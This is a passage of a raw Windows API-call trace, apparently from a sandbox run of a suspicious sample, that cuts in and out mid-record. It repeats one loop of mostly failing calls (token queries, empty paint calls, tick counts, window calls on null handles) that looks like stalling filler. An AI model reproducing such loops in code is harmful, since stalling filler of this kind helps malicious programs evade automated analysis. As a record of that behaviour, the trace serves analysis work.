WTSFreeMemory (pMemory=0x0) [0221.270] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.270] TextOutW (hdc=0x0, x=1624, y=3824, lpString="", c=0) returned 1 [0221.270] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.270] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.270] GetTickCount () returned 0xe407 [0221.272] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.272] SetForegroundWindow (hWnd=0x0) returned 0 [0221.272] BringWindowToTop (hWnd=0x0) returned 0 [0221.272] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4b8) returned 1 [0221.272] GetTokenInformation (in: TokenHandle=0x4b8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.272] GetLastError () returned 0x7a [0221.272] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.272] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.272] WTSFreeMemory (pMemory=0x0) [0221.272] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.272] TextOutW (hdc=0x0, x=1634, y=3849, lpString="", c=0) returned 1 [0221.272] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.272] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.273] GetTickCount () returned 0xe407 [0221.273] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.273] SetForegroundWindow (hWnd=0x0) returned 0 [0221.273] BringWindowToTop (hWnd=0x0) returned 0 [0221.273] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4bc) returned 1 [0221.273] GetTokenInformation (in: TokenHandle=0x4bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.273] GetLastError () returned 0x7a [0221.273] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.273] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.274] WTSFreeMemory (pMemory=0x0) [0221.274] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.274] TextOutW (hdc=0x0, x=1644, y=3874, lpString="", c=0) returned 1 [0221.274] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.274] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.274] GetTickCount () returned 0xe407 [0221.275] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.275] SetForegroundWindow (hWnd=0x0) returned 0 [0221.275] BringWindowToTop (hWnd=0x0) returned 0 [0221.275] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4c0) returned 1 [0221.275] GetTokenInformation (in: TokenHandle=0x4c0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.275] GetLastError () returned 0x7a [0221.275] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.275] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.276] WTSFreeMemory (pMemory=0x0) [0221.276] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.276] TextOutW (hdc=0x0, x=1654, y=3899, lpString="", c=0) returned 1 [0221.276] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.276] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.276] GetTickCount () returned 0xe407 [0221.277] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.277] SetForegroundWindow (hWnd=0x0) returned 0 [0221.277] BringWindowToTop (hWnd=0x0) returned 0 [0221.277] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4c4) returned 1 [0221.277] GetTokenInformation (in: TokenHandle=0x4c4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.277] GetLastError () returned 0x7a [0221.277] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.277] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.277] WTSFreeMemory (pMemory=0x0) [0221.277] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.278] TextOutW (hdc=0x0, x=1664, y=3924, lpString="", c=0) returned 1 [0221.278] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.278] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.278] GetTickCount () returned 0xe407 [0221.278] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.278] SetForegroundWindow (hWnd=0x0) returned 0 [0221.279] BringWindowToTop (hWnd=0x0) returned 0 [0221.279] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4c8) returned 1 [0221.279] GetTokenInformation (in: TokenHandle=0x4c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.279] GetLastError () returned 0x7a [0221.279] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.279] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.279] WTSFreeMemory (pMemory=0x0) [0221.279] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.279] TextOutW (hdc=0x0, x=1674, y=3949, lpString="", c=0) returned 1 [0221.279] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.279] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.279] GetTickCount () returned 0xe407 [0221.280] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.280] SetForegroundWindow (hWnd=0x0) returned 0 [0221.280] BringWindowToTop (hWnd=0x0) returned 0 [0221.280] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4cc) returned 1 [0221.280] GetTokenInformation (in: TokenHandle=0x4cc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.280] GetLastError () returned 0x7a [0221.280] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.280] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.281] WTSFreeMemory (pMemory=0x0) [0221.281] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.281] TextOutW (hdc=0x0, x=1684, y=3974, lpString="", c=0) returned 1 [0221.281] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.281] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.281] GetTickCount () returned 0xe407 [0221.285] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.285] SetForegroundWindow (hWnd=0x0) returned 0 [0221.285] BringWindowToTop (hWnd=0x0) returned 0 [0221.285] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4d0) returned 1 [0221.285] GetTokenInformation (in: TokenHandle=0x4d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.285] GetLastError () returned 0x7a [0221.285] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.285] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.285] WTSFreeMemory (pMemory=0x0) [0221.285] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.286] TextOutW (hdc=0x0, x=1694, y=3999, lpString="", c=0) returned 1 [0221.286] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.286] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.286] GetTickCount () returned 0xe407 [0221.289] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.289] SetForegroundWindow (hWnd=0x0) returned 0 [0221.289] BringWindowToTop (hWnd=0x0) returned 0 [0221.289] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4d4) returned 1 [0221.289] GetTokenInformation (in: TokenHandle=0x4d4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.289] GetLastError () returned 0x7a [0221.289] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.289] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.290] WTSFreeMemory (pMemory=0x0) [0221.290] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.290] TextOutW (hdc=0x0, x=1704, y=4024, lpString="", c=0) returned 1 [0221.290] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.290] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.290] GetTickCount () returned 0xe416 [0221.293] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.293] SetForegroundWindow (hWnd=0x0) returned 0 [0221.293] BringWindowToTop (hWnd=0x0) returned 0 [0221.293] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4d8) returned 1 [0221.293] GetTokenInformation (in: TokenHandle=0x4d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.293] GetLastError () returned 0x7a [0221.293] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.293] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.294] WTSFreeMemory (pMemory=0x0) [0221.294] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.294] TextOutW (hdc=0x0, x=1714, y=4049, lpString="", c=0) returned 1 [0221.294] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.294] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.294] GetTickCount () returned 0xe416 [0221.299] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.299] SetForegroundWindow (hWnd=0x0) returned 0 [0221.299] BringWindowToTop (hWnd=0x0) returned 0 [0221.299] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4dc) returned 1 [0221.299] GetTokenInformation (in: TokenHandle=0x4dc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.299] GetLastError () returned 0x7a [0221.299] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.299] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.300] WTSFreeMemory (pMemory=0x0) [0221.300] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.300] TextOutW (hdc=0x0, x=1724, y=4074, lpString="", c=0) returned 1 [0221.300] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.300] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.300] GetTickCount () returned 0xe416 [0221.306] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.306] SetForegroundWindow (hWnd=0x0) returned 0 [0221.306] BringWindowToTop (hWnd=0x0) returned 0 [0221.306] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4e0) returned 1 [0221.307] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.307] GetLastError () returned 0x7a [0221.307] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.307] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.307] WTSFreeMemory (pMemory=0x0) [0221.307] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.309] TextOutW (hdc=0x0, x=1734, y=4099, lpString="", c=0) returned 1 [0221.309] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.309] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.309] GetTickCount () returned 0xe426 [0221.311] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.311] SetForegroundWindow (hWnd=0x0) returned 0 [0221.311] BringWindowToTop (hWnd=0x0) returned 0 [0221.311] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4e4) returned 1 [0221.311] GetTokenInformation (in: TokenHandle=0x4e4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.311] GetLastError () returned 0x7a [0221.311] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.311] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.312] WTSFreeMemory (pMemory=0x0) [0221.312] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.312] TextOutW (hdc=0x0, x=1744, y=4124, lpString="", c=0) returned 1 [0221.312] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.312] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.312] GetTickCount () returned 0xe426 [0221.312] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.312] SetForegroundWindow (hWnd=0x0) returned 0 [0221.312] BringWindowToTop (hWnd=0x0) returned 0 [0221.312] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4e8) returned 1 [0221.312] GetTokenInformation (in: TokenHandle=0x4e8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.312] GetLastError () returned 0x7a [0221.312] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.313] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.313] WTSFreeMemory (pMemory=0x0) [0221.313] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.313] TextOutW (hdc=0x0, x=1754, y=4149, lpString="", c=0) returned 1 [0221.313] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.313] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.313] GetTickCount () returned 0xe426 [0221.314] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.314] SetForegroundWindow (hWnd=0x0) returned 0 [0221.314] BringWindowToTop (hWnd=0x0) returned 0 [0221.314] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4ec) returned 1 [0221.314] GetTokenInformation (in: TokenHandle=0x4ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.314] GetLastError () returned 0x7a [0221.314] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.314] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.314] WTSFreeMemory (pMemory=0x0) [0221.314] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.314] TextOutW (hdc=0x0, x=1764, y=4174, lpString="", c=0) returned 1 [0221.314] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.315] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.315] GetTickCount () returned 0xe426 [0221.316] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.316] SetForegroundWindow (hWnd=0x0) returned 0 [0221.316] BringWindowToTop (hWnd=0x0) returned 0 [0221.316] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4f0) returned 1 [0221.316] GetTokenInformation (in: TokenHandle=0x4f0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.316] GetLastError () returned 0x7a [0221.316] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.316] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.316] WTSFreeMemory (pMemory=0x0) [0221.316] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.316] TextOutW (hdc=0x0, x=1774, y=4199, lpString="", c=0) returned 1 [0221.316] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.316] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.317] GetTickCount () returned 0xe426 [0221.319] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.319] SetForegroundWindow (hWnd=0x0) returned 0 [0221.319] BringWindowToTop (hWnd=0x0) returned 0 [0221.319] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4f4) returned 1 [0221.320] GetTokenInformation (in: TokenHandle=0x4f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.320] GetLastError () returned 0x7a [0221.320] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.320] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.320] WTSFreeMemory (pMemory=0x0) [0221.320] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.320] TextOutW (hdc=0x0, x=1784, y=4224, lpString="", c=0) returned 1 [0221.320] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.320] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.321] GetTickCount () returned 0xe435 [0221.321] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.321] SetForegroundWindow (hWnd=0x0) returned 0 [0221.321] BringWindowToTop (hWnd=0x0) returned 0 [0221.321] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4f8) returned 1 [0221.321] GetTokenInformation (in: TokenHandle=0x4f8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.321] GetLastError () returned 0x7a [0221.321] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.321] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.322] WTSFreeMemory (pMemory=0x0) [0221.322] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.322] TextOutW (hdc=0x0, x=1794, y=4249, lpString="", c=0) returned 1 [0221.322] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.322] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.322] GetTickCount () returned 0xe435 [0221.323] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.323] SetForegroundWindow (hWnd=0x0) returned 0 [0221.323] BringWindowToTop (hWnd=0x0) returned 0 [0221.323] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x4fc) returned 1 [0221.323] GetTokenInformation (in: TokenHandle=0x4fc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.323] GetLastError () returned 0x7a [0221.324] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.324] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.324] WTSFreeMemory (pMemory=0x0) [0221.324] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.324] TextOutW (hdc=0x0, x=1804, y=4274, lpString="", c=0) returned 1 [0221.324] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.324] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.324] GetTickCount () returned 0xe435 [0221.325] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.325] SetForegroundWindow (hWnd=0x0) returned 0 [0221.325] BringWindowToTop (hWnd=0x0) returned 0 [0221.325] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x500) returned 1 [0221.325] GetTokenInformation (in: TokenHandle=0x500, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.325] GetLastError () returned 0x7a [0221.325] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.325] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.326] WTSFreeMemory (pMemory=0x0) [0221.326] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.326] TextOutW (hdc=0x0, x=1814, y=4299, lpString="", c=0) returned 1 [0221.326] EndPaint (hWnd=0x0, lpPaint=0x209a5fc) returned 0 [0221.326] GetClientRect (in: hWnd=0x0, lpRect=0x209a5e0 | out: lpRect=0x209a5e0) returned 0 [0221.326] GetTickCount () returned 0xe435 [0221.327] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0221.327] SetForegroundWindow (hWnd=0x0) returned 0 [0221.327] BringWindowToTop (hWnd=0x0) returned 0 [0221.327] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x209a42c | out: TokenHandle=0x209a42c*=0x504) returned 1 [0221.327] GetTokenInformation (in: TokenHandle=0x504, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x209a434 | out: TokenInformation=0x0, ReturnLength=0x209a434) returned 0 [0221.327] GetLastError () returned 0x7a [0221.327] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0221.327] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x209a40c, pBytesReturned=0x209a404 | out: ppBuffer=0x209a40c*=0x0, pBytesReturned=0x209a404) returned 0 [0221.328] WTSFreeMemory (pMemory=0x0) [0221.328] BeginPaint (in: hWnd=0x0, lpPaint=0x209a5fc | out: lpPaint=0x209a5fc) returned 0x0 [0221.328] TextOutW (hdc=0x0, x=1824, 